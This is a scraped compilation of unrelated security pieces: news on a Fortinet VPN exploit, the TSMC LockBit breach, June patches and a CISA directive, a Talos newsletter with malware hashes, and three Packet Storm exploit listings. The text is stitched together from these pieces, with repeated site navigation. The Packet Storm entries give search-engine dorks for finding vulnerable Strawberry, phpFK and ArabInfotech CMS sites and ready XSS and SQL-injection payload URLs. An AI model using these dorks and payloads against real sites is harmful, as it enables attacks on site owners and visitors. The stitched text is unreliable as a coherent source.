Some 340,000 FortiGate SSL VPN appliances remain exposed to the threat more than three weeks after Fortinet released firmware updates to address the issue.

Researchers have written exploit code for a critical remote code execution (RCE) vulnerability in Fortinet's FortiGate SSL VPNs that the vendor disclosed and patched in June 2023.

Bishop Fox's research team, which developed the exploit, has estimated there are some 340,000 affected FortiGate devices that are currently unpatched against the flaw and remain open to attack. That number is significantly higher than the 250,000 FortiGate devices that several researchers estimated were vulnerable to exploit when Fortinet first disclosed the flaw on June 12.

**Code Not Released Publicly — but There's a GIF**

"There are 490,000 affected \[FortiGate\] SSL VPN interfaces exposed on the internet, and roughly 69% of them are currently unpatched," Bishop Fox's director of capability development, Caleb Gross, wrote in a blog post on June 30. "You should patch yours now."

The heap-based buffer overflow vulnerability, tracked as CVE-2023-27997, affects multiple versions of FortiOS and FortiProxy SSL-VPN software. It gives an unauthenticated, remote attacker a way to execute arbitrary code on an affected device and take complete control of it. Researchers from French cybersecurity firm Lexfo who discovered the flaw assessed it as affecting every single SSL VPN appliance running FortiOS.

Bishop Fox has not released its exploit code publicly. But its blog post has a GIF of it in use. Gross described the exploit that Bishop Fox has developed as giving attackers a way to open an interactive shell they could use to communicate with an affected FortiGate appliance.

"This exploit very closely follows the steps detailed in the original blog post by Lexfo, though we had to take a few extra steps that were not mentioned in that post," Gross wrote. "The exploit runs in approximately one second, which is significantly faster than the demo video on a 64-bit device shown by Lexfo."

Fortinet issued firmware updates that addressed the issue on June 12. At the time, the company said the flaw affected organizations in government, manufacturing and other critical infrastructure sectors. Fortinet said it was aware of an attacker exploiting the vulnerability in a limited number of cases.

Fortinet cautioned about the potential for threat actors like those behind the Volt Typhoon cyber-espionage campaign to abuse CVE-2023-27997. Volt Typhoon is a China-based group that is believed to have established persistent access on networks belonging to US telecom companies and other critical infrastructure organizations, for stealing sensitive data and carrying out other malicious actions. The campaign so far has primarily used another, older Fortinet flaw (CVE-2022-40684) for initial access. But organizations should not discount the possibility of Volt Typhoon — and other threat actors — using CVE-2023-27997 either, Fortinet warned.

**Why Security Appliances Make Popular Targets**

CVE-2023-27997 is one of numerous critical Fortinet vulnerabilities that have been exposed. Like that of almost every other firewall and VPN vendor, Fortinet's appliances are a popular target for adversaries because of the access they provide to enterprise networks.

The US Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), and others have issued multiple advisories in recent years about the need for organizations to promptly address vulnerabilities in these and other network devices because of the high attacker interest in them.

In June 2022, for instance, CISA warned of China-sponsored threat actors actively targeting unpatched vulnerabilities in network devices from a wide range of vendors. The advisory included a list of the most common of these vulnerabilities. The list included vulnerabilities in products from Fortinet, Cisco, Citrix, Netgear, Pulse, QNAP, and Zyxel.

Systems administrators should patch as quickly as possible, even though patching firmware can be a bit more cumbersome when dealing with appliances that run application gateways, says Timothy Morris, chief security adviser at Tanium. Often, appliances such as those from Fortinet face the perimeter and have very high-availability requirements, meaning they have tight windows for change.

"For most organizations, a certain amount of downtime is probably inevitable," Morris says. Vulnerabilities such as CVE-2023-27997 require the full firmware image to be reloaded, so there is a certain amount of time and risk involved, he adds. "Configurations have to be backed up and restored to make sure they are working as expected."

Researchers Develop Exploit Code for Critical Fortinet VPN Bug

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

**Strawberry 1.1.9 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

Strawberry version 1.1.9 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 5006ad4fe5ee6631967fbcda59c50822e4f6cf4db227a33b6f3fba8640dbb942

Download | Favorite | View

**Strawberry 1.1.9 Cross Site Scripting**

    ====================================================================================================================================| # Title     : Strawberry 1.1.9 XSS Vulnerability                                                                                 || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 66.0.2(32-bit)                                             | | # Vendor    : https://cutenewsru.sourceforge.io/strawberry/                                                                      |  | # Dork      : "Powered by Strawberry 1.1.9"                                                                                      |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : /content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"[+] http://127.0.0.1/dverekomondoorcom/content/index.php/"onmouseover%3d'prompt(document.cookies)'bad%3d"Greetings to :=========================================================================================================================jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |        =======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

Strawberry 1.1.9 Cross Site Scripting

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

Posted Jul 2, 2023

Authored by indoushka

phpFK version 9.2 Beta suffers from cross site scripting and remote SQL injection vulnerabilities.

tags | exploit, remote, vulnerability, xss, sql injection

SHA-256 | 09fef1efe957f866ce2e4d01724c95e85523e37eb341c2135635c17435c8b42c

Download | Favorite | View

**phpFK 9.2 Beta Cross Site Scripting / SQL Injection**

    ====================================================================================================================================| # Title     : phpFK v9.2 Beta version SQLi + XSS Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0.(32-bit)                                              | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

phpFK 9.2 Beta Cross Site Scripting / SQL Injection

ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.

**ArabInfotech CMS 2.0.1 Cross Site Scripting**

Posted Jul 2, 2023

Authored by indoushka

ArabInfotech CMS version 2.0.1 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 670bf364f2d7ff34656860436ff284c800f86d1d679b95be7803858c4d41549d

Download | Favorite | View

**ArabInfotech CMS 2.0.1 Cross Site Scripting**

    ====================================================================================================================================| # Title     : ArabInfotech CMS v 2.0.1 L.L.C Xss Vulnerability                                                                   || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro)                                                                                        || # Vendor    : http://www.editpubdz.com/                                                                                          |  | # Dork      : intext:"Powered By Editpub"                                                                                        |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine [+] use payload : '"()%26%25<acx><script>alert(/indoushka/);</script>[+] http://127.0.0.1/www/reliancerecruiterscom/job-details.php?id=68%27%22()%26%25%3Cacx%3E%3Cscript%3Ealert(/indoushka/);%3C/script%3E====Greetings to :=========================================================================================================================| jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh       |===========================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,554)
*   Arbitrary (16,117)
*   BBS (2,859)
*   Bypass (1,725)
*   CGI (1,025)
*   Code Execution (7,203)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,328)
*   DoS (23,288)
*   Encryption (2,363)
*   Exploit (51,405)
*   File Inclusion (4,202)
*   File Upload (960)
*   Firewall (821)
*   Info Disclosure (2,742)
*   Intrusion Detection (888)
*   Java (3,007)
*   JavaScript (845)
*   Kernel (6,610)
*   Local (14,412)
*   Magazine (586)
*   Overflow (12,627)
*   Perl (1,423)
*   PHP (5,134)
*   Proof of Concept (2,336)
*   Protocol (3,571)
*   Python (1,526)
*   Remote (30,582)
*   Root (3,573)
*   Rootkit (506)
*   Ruby (611)
*   Scanner (1,633)
*   Security Tool (7,861)
*   Shell (3,168)
*   Shellcode (1,212)
*   Sniffer (893)
*   Spoof (2,193)
*   SQL Injection (16,254)
*   TCP (2,395)
*   Trojan (687)
*   UDP (885)
*   Virus (664)
*   Vulnerability (31,654)
*   Web (9,600)
*   Whitepaper (3,747)
*   x86 (961)
*   XSS (17,787)
*   Other

**File Archives**

*   July 2023
*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,981)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,782)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (346)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (46,065)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (483)
*   RedHat (13,489)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,707)
*   UNIX (9,256)
*   UnixWare (186)
*   Windows (6,560)
*   Other

ArabInfotech CMS 2.0.1 Cross Site Scripting

The group has given one of Apple's biggest semiconductor suppliers until Aug. 6 to pay $70 million or risk having its data and "points of entry" to its network publicly leaked.

Taiwan Semiconductor Manufacturing Company (TSMC) — one of Apple's biggest semiconductor suppliers — on Friday blamed a third-party IT hardware supplier for a data breach that has exposed the company to a $70 million ransom demand from the LockBit ransomware group.

In an emailed statement to Dark Reading, TSMC confirmed multiple reports about the security incident but did not say what data specifically LockBit actors might have accessed from its systems and is holding for ransom. The statement, however, described the incident as not affecting any of TSMC's business or customer information.

**Third-Party Breach**

"TSMC has recently been aware that one of our IT hardware suppliers experienced a cybersecurity incident, which led to the leak of information pertinent to server initial setup and configuration," the statement noted. It identified the third-party supplier as Kinmax Technology, a Hsinchu, Taiwan- based systems integrator that claims to work with numerous other major technology players, including Aruba, Checkpoint, Cisco, Citrix, Fortinet, Hewlett-Packard Enterprise, Microsoft, and VMware. It's unclear if any other customers are affected by the attack.

Meanwhile, a subgroup within the LockBit operation that calls itself the National Hazard Agency claimed that it has given TSMC up to Aug. 6 to pay the multimillion-dollar ransom or risk having the company's stolen data publicly leaked. The threat actor claimed that it would also publish what it described as "points of entry" into TSMC's network as well as passwords and login information for gaining access to it. The latter is catnip to cyberattackers given that TSMC is a juicy target: It reported a net income of some $34 billion on consolidated revenue of $75.8 billion in 2022.

TSMC said it had conducted a review of its hardware components and security configurations used in its systems, after Kinmax reported the incident, to determine the scope of the breach. "After the incident, TSMC has immediately terminated its data exchange with this supplier in accordance with the company’s security protocols and standard operating procedures," the statement noted. The chipmaker said it remained committed to enhancing security awareness among its suppliers and in ensuring they complied with the company's security requirements.

**IT Supplier Downplays Incident**

Kinmax said it discovered the intrusion into its systems on June 29. The company described the attacker as having breached the company's engineering test environment and accessing system installation preparation information. 

"This is the system installation environment prepared for customers," Kinmax said in a statement on the incident. "The captured content is parameter information such as installation configuration files."

The statement appeared to downplay the seriousness of the breach. "The \[breached\] information has nothing to do with the actual application of the customer. It is only the basic setting at the time of shipment," the company said. The statement did not identify TSMC by name. But it somewhat bewilderingly claimed that the chipmaker (or others) had not experienced any negative consequences. "At present, no damage has been caused to the customer and the customer has not been hacked by it," the June 30 statement noted.

In the statement shared with Dark Reading, the systems integrator expressed regret over the incident. "We would like to express our sincere apologies to the affected customers, as the leaked information contained their names which may have caused some inconvenience. The company has thoroughly investigated this incident and implemented enhanced security measures to prevent such incidents from occurring in the future," the Kinmax statement said.

TSMC is the latest among a rapidly growing number of organizations that has experienced a data breach via a third-party compromise. News of the company's predicament comes even as reports continue to pour in about numerous organizations falling victim to the Cl0p ransomware gang because of a vulnerability in Progress Software's widely used MOVEit Transfer app. Victims of that campaign so far include biopharma giant AbbVie, Siemens, Schneider Electric, the University of California at Los Angles (UCLA).

Such breaches have brought IT supply chain security into sharp focus in recent years and made it a top priority in the Biden administration's May 2021 cybersecurity executive order.

Chip Giant TSMC Blames $70M LockBit Breach on IT Hardware Supplier

Plus: Microsoft fixes 78 vulnerabilities, VMWare plugs a flaw already used in attacks, and more critical updates from June.

Summer software updates are coming thick and fast, with Apple, Google, and Microsoft issuing multiple patches for serious security flaws in June. Enterprise software firms have also been busy, with fixes released for scary holes in VMWare, Cisco, Fortinet, and Progress Software’s MOVEit products.

A significant number of security bugs squashed during the month are being used in real-life attacks, so read on, take note, and patch your affected systems as soon as you can.

Apple

Hot on the heels of iOS 16.5, June saw the release of an emergency iPhone upgrade, iOS 16.5.1. The latest iPhone update fixes security vulnerabilities in WebKit, the engine that underpins Safari, and in the kernel at the heart of the iOS system.

Tracked as CVE-2023-32439 and CVE-2023-32434, both issues are code-execution bugs and have been used in real-life attacks, Apple said on its support page.

While details about the already exploited flaws are limited, security outfit Kaspersky revealed how the kernel issue was used to perform “iOS Triangulation” attacks against its staff. Impactful because they require no interaction from the user, the “zero click” attacks use an invisible iMessage with a malicious attachment to deliver spyware.

Apple has also issued iOS 15.7.7 for older iPhones fixing the Kernel and WebKit issues, as well as a second WebKit flaw tracked as CVE-2023-32435—which was also reported by Kaspersky as part of the iOS Triangulation attacks.

Meanwhile, Apple released Safari 16.5.1, macOS Ventura 13.4.1, macOS Monterey 12.6.7, macOS Big Sur 11.7.8 , watchOS 9.5.2 and watchOS 8.8.1.

Microsoft

Microsoft’s mid-June Patch Tuesday includes security updates for 78 vulnerabilities, including 28 remote code execution (RCE) bugs. While some of the issues are serious, it is the first Patch Tuesday since March that doesn’t include any already exploited flaws.

The critical issues patched in the June update include CVE-2023-29357, an elevation of privilege vulnerability in Microsoft SharePoint Server with a CVSS score of 9.8. “An attacker who has gained access to spoofed JWT authentication tokens can use them to execute a network attack which bypasses authentication and allows them to gain access to the privileges of an authenticated user,” Microsoft said.

“The attacker needs no privileges, nor does the user need to perform any action,” it added.

Meanwhile, CVE-2023-32031 and CVE-2023-28310 are Microsoft Exchange Server remote code execution vulnerabilities that require an attacker to be authenticated to exploit.

Google Android

It’s time to update your Google Android device, as the tech giant has released its June Security Bulletin. The most serious issue fixed by Google is a critical security vulnerability in the System component, tracked as CVE-2023-21108, that could lead to RCE over Bluetooth with no additional execution privileges needed. Another flaw in the System tracked as CVE-2023-21130 is a RCE bug also marked as critical.

One of the flaws patched in June’s update is CVE-2022-22706, a vulnerability in Arm components that the chipmaker fixed in 2022 after it had already been used in attacks.

Apple, Google, and MOVEit Just Patched Serious Security Flaws

Though government agencies have hundreds of devices exposed to the open Internet, experts wonder if CISA is moving at the right pace.

Researchers have discovered hundreds of devices running on government networks that expose remote management interfaces on the open Web. Thanks to the Cybersecurity and Infrastructure Security Agency (CISA), that will change quickly — possibly too quickly, according to some experts.

On June 13, CISA released Binding Operational Directive (BOD) 23-02, with the goal of eliminating Internet-exposed management interfaces running on edge devices in Federal Civilian Executive Branch (FCEB) agency networks. The announcement came soon after CISA's advisory about Volt Typhoon, the Chinese state-backed advanced persistent threat (APT) that leveraged Fortinet FortiGuard devices in espionage campaigns against US government entities.

To gauge how significant BOD 23-02 would be, researchers at Censys scanned the Internet for devices exposing management interfaces in federal civilian executive branch (FCEB) agencies. The scans revealed nearly 250 qualifying devices, as well as a number of other network vulnerabilities outside of the scope of BOD 23-02. 

"While this level of exposure probably doesn't warrant an immediate panic, it's still worrisome, because it could be just the tip of the iceberg," says Himaja Motheram, security researcher for Censys. "It suggests that there may be deeper and more critical security issues, if this kind of basic hygiene isn't being met."

**How Exposed FCEB Organizations Are**

Devices qualifying under BOD 23-02 include Internet-exposed routers, switches, firewalls, VPN concentrators, proxies, load balancers, out-of-band server management interfaces, and any others "for which the management interfaces are using network protocols for remote management over public Internet," CISA explained — protocols like HTTP, FTP SMB, and others.

Censys researchers discovered hundreds of such devices, including various Cisco devices exposing Adaptive Security Device Manager interfaces, Cradlepoint router interfaces, and popular firewall products from Fortinet and SonicWall. They also found more than 15 instances of exposed remote access protocols running on FCEB-related hosts.

The search was so bountiful that they even uncovered many federal network vulnerabilities beyond the scope of BOD 23-02, including exposed file transfer tools like GoAnywhere MFT and MoveIt, exposed Barracuda email security gateways, and various instances of defunct software.

Organizations often don't know their level of exposure or don't understand the implications of exposure. Motheram emphasizes that unprotected gear was all quite simple to find. "And what was trivial for us to find is, honestly, probably even more trivial for amateur threat actors out there."

**How Edge Devices Get Exposed**

How is it that so many devices are exposed on otherwise highly scrutinized government networks?

Joe Head, CTO of Intrusion, points to any number of reasons, including "convenience of the administrator, lack of operational security awareness, lack of respect for adversaries, use of default or known passwords, and lack of visibility."

James Cochran, director of endpoint security at Tanium, adds that "staffing shortages can cause overworked IT teams to take shortcuts so they can make the management of the network easier."

Consider, too, the traps unique to the government that can make the problem even worse. "With little oversight and concern about potential threats, devices can get added to the network under the guise of being 'mission critical,' which absolves them from all scrutiny," Cochran laments. Agencies can also merge or expand, with gaps in their network and security integration. “Over time, the overall networks begin to resemble something out of a Mad Max movie, where random things are bolted together and you are not sure why."

**Will BOD 23-02 Turn Things Around?**

In its directive, CISA indicated that it will begin scanning for qualifying devices and informing the culpable agencies. Upon notification, offending agencies will have just 14 days to either disconnect these devices from the Web, or "deploy capabilities, as part of a zero-trust architecture, that enforce access control to the interface through a policy enforcement point separate from the interface itself."

That two-week period will force relevant agencies to act fast to secure their systems. But that could be difficult, Motheram acknowledges. "In theory, removing devices that are exposed from the Internet should be simple, but that's not always the reality. There can be some bureaucracy to deal with when changing access policies that add friction," she explains.

Others believe the burden is undue. "This is not a responsible timeline," Cochran says. "Since the problem is so widespread, I would expect there to be significant impacts to the identified agencies. This is the same as trying to untangle a bunch of wires by sawing through them."

Others applaud CISA's no-nonsense approach. "It is hard to come up with a timeline to stop doing what should have never been done," Head says, arguing that 14 days may be too long to wait. "Five minutes would be more advisable as managers task the corrective network changes. It has been standard practice not to expose management interfaces to the public Internet for years, so making it mandatory is prudent and reasonable."

CISA Wants Exposed Government Devices Remediated in 14 Days

Apple's emergency patch, AI-generated art and more security headlines from the past week.

Thursday, June 29, 2023 14:06

Welcome to this week’s edition of the Threat Source newsletter.

AI-generated art is causing drama across the internet over the past few months, from Marvel TV show opening credits scenes to predatory YouTubers who claim YOU can make millions by having AI tools create children’s books for you.

There are all sorts of ethical and legal implications that AI-generated art has that I don’t have the space here to cover, but I did think it was worth noting that these tools are already being used in cyber attacks and online scams.

These tools can create extremely convincing deepfake art that could lead to the spread of misinformation or disinformation, especially concerning major news events and political figures. I’ve written about this in the newsletter before.

There are also dozens of apps that promise to create convincing AI art or portraits of people serving another malicious purpose. As McAfee pointed out in this blog post, some Android apps offered to “zhuzh up” users’ profile pictures with AI filters but were actually trojanized apps with hidden information stealers. And at the end of the day, they were all using the same basic filters. Many of these apps could also be stealing and re-using the pictures users submitted to these apps (remember the saga of the app that showed what it would be like when you got old?).

I have more to get to this week, so I’m not going to go much deeper into the subject, but as always, be vigilant of apps’ privacy policies and do a quick background check on their creators before downloading something hoping to create a Skrull version of yourself.

I’m also excited to show off this new video featuring a behind-the-scenes interview with Talos.

This video from Cisco Secure shines a spotlight on the evolution and future of ransomware. Watch it below or over on Cisco.com here to find out how our threat hunters identify new and evolving threats in the wild, and how their research and intelligence help organizations build strong defenses.

**The one big thing**

Apple released an emergency patch last week for all its operating systems for two zero-click vulnerabilities that could allow an attacker to completely take over a targeted device. The two vulnerabilities, identified as CVE-2023-32434 and CVE-2023-32435, were used to reportedly compromise phones in Russia. The issues were part of the so-called Triangulation spyware discovered on iPhones of employees of Kaspersky, a Russia-based cybersecurity company, but the malware was removed from phones after a device reboot.

**Why do I care?**

The chances of being targeted by the Triangulation spyware is slim-to-none based on what the security community knows to this point, but either way, the existence of a zero-day vulnerability in iOS is always big news. Apple encouraged users to upgrade to iOS 16.5.1 and iPadOS 16.5.1 for users of those devices. The company also said that CVE-2023-32434 "may have been actively exploited against versions of iOS released before iOS 15.7."

**So now what?**

All Apple users should update these affected products as soon as possible. The U.S. Cybersecurity and Infrastructure Security Agency also released an advisory telling “users and administrators to review \[Apple’s\] advisories and apply the necessary updates.”

**Top security headlines of the week**

The self-identifying hacktivist group “Anonymous Sudan” is **more active than initially thought.** While researchers are still unsure as to the group’s connections to any nation-states, the group says it’s advocating on behalf of Sudan. It first came onto the scene earlier this month, taking credit for a distributed denial-of-service attack against Microsoft that affected Outlook. Now, researchers are saying their activities actually started prior to that with attacks targeting Israel, Sweden and other nations earlier this year. Microsoft confirmed last week that a Layer 7 DDoS attack was responsible for outages affecting Azure, Outlook and OneDrive, saying that, “these attacks likely rely on access to multiple virtual private servers (VPS) in conjunction with rented cloud infrastructure, open proxies, and DDoS tools” and that there is “no evidence that customer data has been accessed or compromised." (Bloomberg, Bleeping Computer)

**The list of companies affected by the MOVEit breach continues to grow.** Clop, the threat actor behind the attacks, added Schneider Electric and Siemens Energy — two major electric corporations — to its leak site this week. The University of California Los Angeles (UCLA) also confirmed it discovered on June 1 that it was the target of the campaign, though it quickly engaged the college’s incident response team and patched the issue. Since the attack went public, Clop’s leak site mainly called out seven U.S. state and local governments, including the nation’s largest public-employee pension fund — the California Public Employees’ Retirement System. And the New York City public school system was also affected, with more than 45,000 students having their personal data stolen, including sensitive information like Social Security numbers. (The Record by Recorded Future, CyberScoop)

**The FBI seized the domain belonging to the infamous hacking site BreachForums,** three months after arresting its creator. Users of BreachForums were known for sharing and selling stolen personal data from a variety of websites and companies. BreachForums was quiet for several weeks after the admin, known as “Pompompurin,” was arrested. However, the site’s newest admin decided to launch the site on new servers earlier this month. In addition to the usual display of the law enforcement agencies’ logos who were involved in the takedown, BreachForums’ homepage now also displays an image of the avatar Pompompurin used in handcuffs. (TechCrunch, Infosecurity Magazine)

**Can’t get enough Talos?**

*   Service overview: Talos Incident Response purple team
*   Vulnerability Spotlight: Use-after-free condition in Google Chrome WebGL
*   Video: How Talos’ open-source tools can assist anyone looking to improve their security resilience
*   Talos Takes Ep. #144: What we know so far about the MOVEit zero-day making the rounds

**Upcoming events where you can find Talos**

**BlackHat** **(Aug. 5 - 10)**

Las Vegas, Nevada

**Grace Hopper Celebration (Sept. 26 - 29)**

Orlando, Florida

> _Caitlin Huey, Susan Paskey and Alexis Merritt present a "Level Up Lab" titled "Don’t Fail Knowledge Checks: Accelerating Incident Response with Threat Intelligence." Participate in several fast-paced activities that emphasize the importance of threat intelligence in security incident investigations. Attendees will act as incident responders investigating a simulated incident that unfolds throughout this session. Periodic checkpoints will include discussions that highlight how incident response and threat intelligence complement each other during an active security investigation._

**Most prevalent malware files from Talos telemetry over the past week**

**SHA 256:** 5616b94f1a40b49096e2f8f78d646891b45c649473a5b67b8beddac46ad398e1  
**MD5:** 3e10a74a7613d1cae4b9749d7ec93515  
**Typical Filename:** IMG001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Dropper.Coinminer::1201

**SHA 256:** 59f1e69b68de4839c65b6e6d39ac7a272e2611ec1ed1bf73a4f455e2ca20eeaa  
**MD5:** df11b3105df8d7c70e7b501e210e3cc3  
**Typical Filename:** DOC001.exe  
**Claimed Product:** N/A  
**Detection Name:** Win.Worm.Coinminer::1201

**SHA 256:** a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
**MD5:** 7bdbd180c081fa63ca94f9c22c457376  
**Typical Filename:** c0dwjdi6a.dll  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.33515991

**SHA 256:** e12b6641d7e7e4da97a0ff8e1a0d4840c882569d47b8fab8fb187ac2b475636c  
**MD5:** a087b2e6ec57b08c0d0750c60f96a74c  
**Typical Filename:** AAct.exe  
**Claimed Product:** N/A  
**Detection Name:** PUA.Win.Tool.Kmsauto::1201

**SHA 256:** 00ab15b194cc1fc8e48e849ca9717c0700ef7ce2265511276f7015d7037d8725  
**MD5:** d47fa115154927113b05bd3c8a308201  
**Typical Filename:** mssqlsrv.exe  
**Claimed Product:** N/A  
**Detection Name:** Trojan.GenericKD.65065311

New video provides a behind-the-scenes look at Talos ransomware hunters

A Purple Team exercise is a collaborative approach between offensive (Red) teams and defensive (Blue) teams.

Thursday, June 29, 2023 08:06

Purple Team exercises are included within the Cisco Talos Incident Response Retainer service and our experts can help your organization find security holes before the bad guys can.

As your trusted advisor, our purple team, which is a combination of both red and blue teams, emulates one joint attack scenario, executes the scenario, and records how your current incident response capabilities perform to evaluate your current gaps and inform future enhancements.

Can your organization’s current security incident response program withstand an emulated adversarial attack? Need to put your current TTPs detections to the test? Not sure where to start, what to test, or what gaps exist in your program? No fear, Talos IR can partner with you to provide Purple Team expertise and exercises, tailored for your organization to proactively test and enhance your prevention, detection and response capabilities.

During the Purple Team exercise, an external Red Team acts as an Advanced Persistence Threat (APT) actor while the Talos IR Blue Team, together with the organization’s defender team, is responsible for detecting those activities and responding to the attack in accordance with the existing security procedures.

If you want to learn more about Talos IR's Purple Team, tune into the next Talos IR On Air stream on July 27 at 12 p.m. ET. The stream will be available live on Talos' Twitter and LinkedIn, with a replay going up shortly after on our YouTube page.

Organizations of all sizes can benefit from the Purple Team exercises Cisco offers to proactively test your current cybersecurity risks and solidify your team’s TTPs and increase your overall security knowledge in advance of a cybersecurity incident.

**Purple Team value for joint teams**

Cisco can partner with you to provide Purple Team expertise and exercises, tailored for your organization, to proactively test and enhance your detection and response capabilities. A Purple Team exercise is a collaborative approach between offensive (Red) teams and defensive (Blue) teams. The Red Team emulates adversary TTPs, while the Blue Team, which consists of seasoned Talos IR responders, works side-by-side with your organization’s defenders to detect and respond to those attacks. During the exercise, the Blue Team is challenged to use the organization’s existing internal security TTPs policies and procedures and test available security tooling. This type of dynamic emulation helps proactively identify any gaps in training and resources and increases the organization’s security awareness and preparedness for the future.

